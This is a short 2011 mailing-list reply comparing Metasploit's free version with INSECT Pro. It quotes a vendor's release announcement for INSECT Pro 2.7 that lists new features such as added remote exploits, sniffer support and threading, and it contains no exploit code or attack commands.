metasploit is pro version too, but, they at least provide a stable and usable
free version... insect needs a nudge !





On 27 August 2011 12:02, Juan Sacco jsa...@insecurityresearch.com wrote:

 We are happy to announce a new release of INSECT Pro 2.7 including
 changes that people ask about most often

 This is a partial list of the major changes implemented in version 2.7

 - Available targets now have a submenu under right-click button
 - Check update function added in order to verify current version
 - Threading support for GET request
 - Module log added and functional
 - Sniffer support added
 - 50 Remote exploits added
 - Project saved on userland - Application Data special folder
 - Executed module windows added and functionality for it
 - AgentConnect now uses telnetlib

 Download now from: http://www.insecurityresearch.com

 Juan Sacco (runlvl)

 --
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.7 was released, stay tuned

